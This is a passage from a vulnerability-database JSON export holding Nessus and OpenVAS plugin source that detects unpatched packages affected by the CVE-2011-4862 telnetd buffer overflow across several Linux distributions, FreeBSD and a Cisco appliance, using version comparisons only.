(isnull(cpu)) 
audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2010.1\", reference:\"krb5-appl-clients-1.0-4.2mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"krb5-appl-servers-1.0-4.2mdv2010.2\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2011\", reference:\"krb5-appl-clients-1.0.2-1.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"krb5-appl-servers-1.0.2-1.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"netkit-telnet-0.17-12.1-mdv2011.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2011\", reference:\"netkit-telnet-server-0.17-12.1-mdv2011.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:32:24", "description": "According to its self-reported version, the version of AsyncOS running\non the remote Cisco Content Security Management Appliance (SMA) is\naffected by a remote code execution vulnerability due to a buffer\noverflow condition in the telnet component.", "edition": 26, "published": "2014-11-17T00:00:00", "title": "Cisco Content Security Management Appliance Telnet Remote Code Execution (cisco-sa-20120126-ironport)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/h:cisco:content_security_management_appliance", "cpe:/o:cisco:asyncos"], "id": "CISCO-SA-20120126-SMA.NASL", "href": "https://www.tenable.com/plugins/nessus/79272", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79272);\n script_version(\"1.6\");\n 
script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\"CVE-2011-4862\");\n script_bugtraq_id(51182);\n script_xref(name:\"EDB-ID\", value:\"18280\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCzv44580\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20120126-ironport\");\n\n script_name(english:\"Cisco Content Security Management Appliance Telnet Remote Code Execution (cisco-sa-20120126-ironport)\");\n script_summary(english:\"Checks the SMA version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote security appliance is missing a vendor-supplied patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the version of AsyncOS running\non the remote Cisco Content Security Management Appliance (SMA) is\naffected by a remote code execution vulnerability due to a buffer\noverflow condition in the telnet component.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120126-ironport\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a6a6592a\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCzv44580\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.freebsd.org/security/advisories/FreeBSD-SA-11:08.telnetd.asc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant update referenced in Cisco Security Advisory\ncisco-sa-20120126-ironport.\n\nAlternatively, as a workaround, the vendor notes that Telnet services\ncan be disabled on the device.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n 
script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-760\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/12/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:content_security_management_appliance\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:asyncos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_sma_version.nasl\");\n script_require_keys(\"Host/AsyncOS/Cisco Content Security Management Appliance/DisplayVersion\", \"Host/AsyncOS/Cisco Content Security Management Appliance/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\ndisplay_ver = get_kb_item_or_exit('Host/AsyncOS/Cisco Content Security Management Appliance/DisplayVersion');\nver = get_kb_item_or_exit('Host/AsyncOS/Cisco Content Security Management Appliance/Version');\n\n# If not paranoid, check if telnet is detected first.\n# get_service() may fork; don't use.\nif (report_paranoia < 2) get_kb_list_or_exit(\"Services/telnet\");\n\n# Affected/Fixed for Cisco AsyncOS Software for Cisco SMA :\n# 7.2 and prior - 7.2.2-106\n# 7.7 - 7.7.0-206\n# 7.8 - Not Available - Upgrade to 7.9 or later (thus, 7.9.1-102)\n# 7.9 - 7.9.1-102\n# 8.0 - Not Affected\n# 8.1 - Not Affected\n# 8.2 - Not Affected\n# 8.3 - Not Affected\nif (ver =~ \"^[0-6]\\.\" || ver =~ \"^7\\.[012]\\.\")\n display_fix = '7.2.2-106';\nelse if (ver =~ \"^7\\.7\\.\")\n display_fix = '7.7.0-206';\nelse if (ver =~ \"^7\\.[89]\\.\")\n display_fix = '7.9.1-102';\nelse\n audit(AUDIT_INST_VER_NOT_VULN, 'Cisco SMA', display_ver);\n\nfix = str_replace(string:display_fix, find:'-', replace:'.');\n\nif (ver_compare(ver:ver, fix:fix, strict:FALSE) >= 0) audit(AUDIT_INST_VER_NOT_VULN, 'Cisco SMA', display_ver);\n\nif (report_verbosity > 0)\n{\n report =\n '\\n Installed version : ' + display_ver +\n '\\n Fixed version : ' + display_fix + \n '\\n';\n security_hole(port:0, extra:report);\n}\nelse security_hole(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:24:26", "description": " - Fixed a remote code execution in ktelnetd (CVE-2011-4862\n / bnc#738632)", "edition": 18, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : krb5-appl (openSUSE-2012-17)", 
"type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:krb5-appl-clients", "p-cpe:/a:novell:opensuse:krb5-appl-debugsource", "cpe:/o:novell:opensuse:12.1", "p-cpe:/a:novell:opensuse:krb5-appl-servers", "p-cpe:/a:novell:opensuse:krb5-appl-servers-debuginfo", "p-cpe:/a:novell:opensuse:krb5-appl-clients-debuginfo"], "id": "OPENSUSE-2012-17.NASL", "href": "https://www.tenable.com/plugins/nessus/74578", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2012-17.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74578);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-4862\");\n\n script_name(english:\"openSUSE Security Update : krb5-appl (openSUSE-2012-17)\");\n script_summary(english:\"Check for the openSUSE-2012-17 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Fixed a remote code execution in ktelnetd (CVE-2011-4862\n / bnc#738632)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=738632\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected krb5-appl packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n 
script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-11-760\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:krb5-appl-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:krb5-appl-clients-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:krb5-appl-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:krb5-appl-servers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:krb5-appl-servers-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.1\", reference:\"krb5-appl-clients-1.0.2-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"krb5-appl-clients-debuginfo-1.0.2-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"krb5-appl-debugsource-1.0.2-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"krb5-appl-servers-1.0.2-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"krb5-appl-servers-debuginfo-1.0.2-5.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"krb5-appl-clients / krb5-appl-clients-debuginfo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-02T21:10:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "description": "The remote host is missing an update 
to the system\nas announced in the referenced advisory.", "modified": "2017-04-21T00:00:00", "published": "2012-02-13T00:00:00", "id": "OPENVAS:70585", "href": "http://plugins.openvas.org/nasl.php?oid=70585", "type": "openvas", "title": "FreeBSD Ports: krb5-appl", "sourceData": "#\n#VID 4ddc78dc-300a-11e1-a2aa-0016ce01e285\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 4ddc78dc-300a-11e1-a2aa-0016ce01e285\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: krb5-appl\n\nCVE-2011-4862\nBuffer overflow in libtelnet/encrypt.c in telnetd in FreeBSD 7.3\nthrough 9.0, MIT Kerberos Version 5 Applications (aka krb5-appl) 1.0.2\nand earlier, and Heimdal 1.5.1 and earlier allows remote attackers to\nexecute arbitrary code via a long encryption key, as exploited in the\nwild in December 2011.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://security.FreeBSD.org/advisories/FreeBSD-SA-11:08.telnetd.asc\nhttp://www.vuxml.org/freebsd/4ddc78dc-300a-11e1-a2aa-0016ce01e285.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(70585);\n script_tag(name:\"creation_date\", value:\"2012-02-13 01:48:16 +0100 (Mon, 13 Feb 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-21 11:02:32 +0200 (Fri, 21 Apr 2017) $\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-4862\");\n script_version(\"$Revision: 5999 $\");\n script_name(\"FreeBSD Ports: krb5-appl\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"krb5-appl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.0.2_1\")<0) {\n txt += 'Package krb5-appl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201202-05.", "modified": "2017-07-07T00:00:00", "published": "2012-03-12T00:00:00", "id": "OPENVAS:71180", "href": "http://plugins.openvas.org/nasl.php?oid=71180", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201202-05 (heimdal)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A boundary error in Heimdal could result in execution of arbitrary\n code.\";\ntag_solution = \"All Heimdal users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-crypt/heimdal-1.5.1-r1'\n \n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20201202-05\nhttp://bugs.gentoo.org/show_bug.cgi?id=396105\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 201202-05.\";\n\n \n \nif(description)\n{\n script_id(71180);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-4862\");\n script_version(\"$Revision: 6589 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 10:27:50 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-12 11:35:34 -0400 (Mon, 12 Mar 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201202-05 (heimdal)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"app-crypt/heimdal\", unaffected: make_list(\"ge 1.5.1-r1\"), vulnerable: make_list(\"lt 1.5.1-r1\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-03-19T00:00:00", "id": "OPENVAS:1361412562310863823", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863823", "type": "openvas", "title": "Fedora Update for krb5-appl FEDORA-2011-17493", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for krb5-appl FEDORA-2011-17493\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but 
WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-January/071640.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863823\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-19 12:19:54 +0530 (Mon, 19 Mar 2012)\");\n script_cve_id(\"CVE-2011-4862\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2011-17493\");\n script_name(\"Fedora Update for krb5-appl FEDORA-2011-17493\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'krb5-appl'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"krb5-appl on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 
rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"krb5-appl\", rpm:\"krb5-appl~1.0.2~2.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:50:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4862"], "description": "The remote host is missing an update to inetutils\nannounced via advisory DSA 2373-1.", "modified": "2017-07-07T00:00:00", "published": "2012-02-11T00:00:00", "id": "OPENVAS:70691", "href": "http://plugins.openvas.org/nasl.php?oid=70691", "type": "openvas", "title": "Debian Security Advisory DSA 2373-1 (inetutils)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2373_1.nasl 6612 2017-07-07 12:08:03Z cfischer $\n# Description: Auto-generated from advisory DSA 2373-1 (inetutils)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that the Kerberos support for telnetd contains a\npre-authentication buffer overflow, which may enable remote attackers\nwho can connect to the Telnet to execute arbitrary code with root\nprivileges.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 2:1.5.dfsg.1-9+lenny1.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 2:1.6-3.1+squeeze1.\n\nFor the testing distribution (wheezy) and the unstable distribution\n(sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your inetutils packages.\";\ntag_summary = \"The remote host is missing an update to inetutils\nannounced via advisory DSA 2373-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202373-1\";\n\nif(description)\n{\n script_id(70691);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-4862\");\n script_version(\"$Revision: 6612 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:03 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-11 03:21:01 -0500 (Sat, 11 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2373-1 (inetutils)\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"inetutils-ftp\", ver:\"2:1.5.dfsg.1-9+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-ftpd\", ver:\"2:1.5.dfsg.1-9+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-inetd\", ver:\"2:1.5.dfsg.1-9+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-ping\", ver:\"2:1.5.dfsg.1-9+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-syslogd\", ver:\"2:1.5.dfsg.1-9+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-talk\", ver:\"2:1.5.dfsg.1-9+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-talkd\", ver:\"2:1.5.dfsg.1-9+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-telnet\", ver:\"2:1.5.dfsg.1-9+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-telnetd\", ver:\"2:1.5.dfsg.1-9+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-tools\", ver:\"2:1.5.dfsg.1-9+lenny1\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"inetutils-ftp\", ver:\"2:1.6-3.1+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res 
